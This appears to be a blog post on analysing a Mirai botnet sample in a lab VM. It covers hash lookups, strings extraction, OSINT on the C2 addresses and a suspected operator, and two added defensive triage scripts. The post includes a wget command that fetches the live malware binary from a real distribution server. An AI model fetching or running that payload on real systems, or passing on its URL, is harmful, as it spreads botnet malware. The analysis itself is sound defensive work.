2 Hour Malware Analysis

Cybernaut
4 min read · May 24, 2021


In the previous post, we saw a US-hosted Chinese IP address being used to launch attacks against US infrastructure. We also saw an unrelated IP address using a form of dropper malware that attempted to install additional payloads. In this post, we analyze one of the secondary payloads retrieved by that dropper.

First, we will set up our malware analysis environment. We do not want to accidentally execute live malware on an unprepared machine, which is a real risk in this scenario.

Having already downloaded the SANS SIFT workstation as our malware analysis lab and taken a snapshot prior to this project, we follow a modified version of the example from the book Learning Malware Analysis by Monnappa K. A:

  1. Download the malicious payload and take a look at known intel, before modifying permissions to make it executable.
  2. Use the following command to download the file into our environment without executing it:
     wget http://31.210.20.138/uwu/x86
  3. Change the guest VM to a host-only network and reboot before executing the malware.

Running the malware retrieval link through VirusTotal reveals that this is a known malware repository.

We also take a look at AlienVault’s assessment of this piece of software by searching the hash value.

First reported February 13, 2021; possibly newer malware?
Android-specific malware

We also search AlienVault to see what analysis it has available.

We start to get a better picture of its intended purpose: to add this “android machine” to a Mirai botnet.

Second, we take a look at some of the features and behavior of x86.

The following commands yield these results:

file x86

reports an ELF executable

sha256sum x86

matches the known malware sample from earlier

strings x86 (selected results; the many inappropriate variable names are ignored)

I found three main pieces of information in the extracted strings: possible shellcode, a first IP address, and a second IP address with attribution. Using these, I looked into the IP addresses and who may be behind them.
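The three commands above (file, sha256sum, strings) plus picking the IP addresses out of the strings output are the core of a first static pass over a sample, and they can be done without ever executing it. The script below is an added example, not code from the original post: it hashes the file, checks the ELF magic bytes directly, and pulls dotted-quad and URL candidates out of the printable strings. Because it has to run offline, it writes a small constructed stand-in file (ELF magic plus a few planted strings using RFC 5737 documentation addresses) when SAMPLE is not set; the file name, the planted strings and the 192.0.2.10 / 198.51.100.7 addresses are all constructed for the example.

```shell
#!/bin/sh
# Static triage of a suspect ELF sample without running it. Added example,
# not code from the original post. Set SAMPLE to a real sample path inside an
# isolated analysis VM; otherwise a harmless constructed stand-in is created.

set -eu

# Constructed stand-in: ELF magic bytes followed by the kinds of strings the
# post pulled out (a URL with a port, a bare IP, a repeating token).
# Not real malware; 192.0.2.10 and 198.51.100.7 are RFC 5737 test addresses.
make_constructed_sample() {
    printf '\177ELF\001\001\001' > "$1"
    printf 'http://192.0.2.10:8444/\0' >> "$1"
    printf 'GET /bot/x86 HTTP/1.0\0' >> "$1"
    printf '198.51.100.7\0' >> "$1"
    printf '38FJ93ID9A38FJ93ID9A38FJ93ID9A\0' >> "$1"
}

# SHA-256 for lookups in VirusTotal / AlienVault OTX (what sha256sum prints),
# with a fallback for systems that only ship shasum.
sample_sha256() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1"
    else
        shasum -a 256 "$1"
    fi | cut -d' ' -f1
}

# True when the first four bytes are the ELF magic 7f 45 4c 46 ("\x7fELF"),
# so the type check does not depend on the `file` utility being installed.
is_elf() {
    [ "$(head -c 4 "$1" | od -An -tx1 | tr -d ' \n')" = "7f454c46" ]
}

# Portable stand-in for `strings -n 4`: runs of four or more printable bytes.
printable_strings() {
    tr -c '[:print:]' '\n' < "$1" | grep -E '.{4,}' || true
}

# Dotted-quad candidates (the pivot used for the OSINT work), unique and sorted.
extract_ipv4() {
    printable_strings "$1" | grep -oE '([0-9]{1,3}\.){3}[0-9]{1,3}' | sort -u
}

# URL-looking strings, which also expose the port the sample talks to.
extract_urls() {
    printable_strings "$1" | grep -oE 'https?://[^[:space:]]+' | sort -u
}

# Compact triage report: hash to search, type check, network-looking strings.
triage_report() {
    printf 'sample : %s\n' "$1"
    printf 'sha256 : %s\n' "$(sample_sha256 "$1")"
    if is_elf "$1"; then echo 'type   : ELF'; else echo 'type   : not ELF'; fi
    echo 'ipv4   :'; extract_ipv4 "$1" | sed 's/^/  /'
    echo 'urls   :'; extract_urls "$1" | sed 's/^/  /'
}

# Only build the stand-in when no real sample path was supplied.
if [ -z "${SAMPLE:-}" ]; then
    SAMPLE=./constructed_sample.bin
    make_constructed_sample "$SAMPLE"
fi
triage_report "$SAMPLE"
```

Run it as `SAMPLE=/path/to/x86 sh triage.sh` inside the snapshotted VM; the hash it prints is the value to search in VirusTotal and AlienVault, and the extracted addresses are the ones to check with the OSINT tools used later in the post. Everything here only reads the file, so the sample never needs execute permission for this step.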

Possibly shellcode: repeating segments of “38FJ93ID9A”, possibly double-encoded or otherwise obfuscated.
The first extracted IP string
Hostwinds LLC is the owner of this IP address
Navigating to this IP address reveals it is web accessible
Censys reveals a little more about whether HTTPS is running.

This IP address hosts HTTPS on port 8444.

With https:// prepended
Several hits from SpiderFoot regarding known malicious behavior from a known malicious subnet.

We also see an interesting second IP address.

A botnet indeed
Also a known malicious IP address with malicious behavior
This particular IP address is owned by VolumeDrive

Investigating this IP address further reveals a few more pieces of information. I used SpiderFoot, a resource that aggregates known OSINT intel for a given IP address, and imported several API keys to maximize the available data.

SpiderFoot geolocates this IP address to Encino, CA
Host for this IP address, according to SpiderFoot

The first address is a UPS store.

Pennsylvania address is a UPS Store

Now we look at who Greek Helios may be.

Greek Helios YouTube channel. Has videos demonstrating the use of a botnet.

Not much information on the individual, so I attempt to find metadata in the profile photo.

Running exiftool does not reveal much additional info from the profile photo

Inspect element in the browser shows the profile photo’s origin to be:

https://yt3.ggpht.com/ytc/AAUvwngOiMrhzA4OSOEbkjopjMrjf0kZMsykwNqJ9MHiXA=s88-c-k-c0x00ffffff-no-rj

In the lab environment, upon execution, a strange statement is printed to the console.

“don’t catch all the malware”
Running netstat -pant shows an established connection to what is likely a C2 server at one of the previously extracted IP addresses
The connection drops, reappears after the first process is killed, and disappears again later
AlienVault reveals the user of this malware to be DDoS-focused.
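The netstat check above (an ESTABLISHED socket whose peer is one of the addresses found in the strings output) is the kind of observation worth scripting so it can be repeated, for instance right after killing the first process to catch the connection reappearing. The script below is an added example, not code from the original post: it feeds netstat -pant output to awk, keeps only ESTABLISHED rows, strips the port (and an IPv4-mapped ::ffff: prefix on tcp6 rows) from the foreign address, and reports the owning PID/program for any peer on the IoC list. The IoC list and the netstat output embedded here are constructed for the example using RFC 5737 documentation addresses; the program name x86 mirrors the sample's file name.

```shell
#!/bin/sh
# Flag ESTABLISHED connections from the lab VM to addresses pulled out of the
# sample: the check the post did by eye with netstat -pant. Added example, not
# code from the original post. The IoC list and netstat output below are
# constructed so the script runs offline.

set -eu

# IoC addresses as extracted from the sample's strings (constructed values).
IOC_IPS='192.0.2.10 198.51.100.7'

# Constructed netstat -pant output, shaped like the real thing, including a
# tcp6 row with an IPv4-mapped peer and a non-ESTABLISHED row that must be ignored.
NETSTAT_SAMPLE='Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      700/sshd
tcp        0      0 10.0.0.5:22             10.0.0.1:55012          ESTABLISHED 812/sshd: user
tcp        0      0 10.0.0.5:49152          192.0.2.10:8444         ESTABLISHED 1337/x86
tcp        0      0 10.0.0.5:49160          198.51.100.50:443       TIME_WAIT   -
tcp6       0      0 ::ffff:10.0.0.5:49170   ::ffff:198.51.100.7:80  ESTABLISHED 1337/x86'

# Print "peer-ip pid/program" for every ESTABLISHED socket whose peer is an IoC.
# $1: space-separated IoC IPs; $2: the text of `netstat -pant`.
flag_c2_connections() {
    printf '%s\n' "$2" | awk -v list="$1" '
        BEGIN { n = split(list, arr, " "); for (i = 1; i <= n; i++) iocs[arr[i]] = 1 }
        $1 ~ /^(tcp|udp)/ && $6 == "ESTABLISHED" {
            peer = $5
            sub(/:[^:]*$/, "", peer)      # drop the remote port
            sub(/^::ffff:/, "", peer)     # unwrap IPv4-mapped IPv6 peers
            if (peer in iocs) print peer, $7
        }'
}

# Offline demonstration on the constructed output.
flag_c2_connections "$IOC_IPS" "$NETSTAT_SAMPLE"

# On the live lab VM, repeat the check after each intervention, e.g.:
#   flag_c2_connections "$IOC_IPS" "$(netstat -pant 2>/dev/null)"
```

Each hit names the process holding the socket, which is what you need to kill it and then re-run the check to see whether, as observed above, the connection comes back under a different PID. The same function works on `ss -tnp` output only after adjusting the column positions, since ss lays its fields out differently.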

In our final post, we will disassemble this malware using some open-source tools.
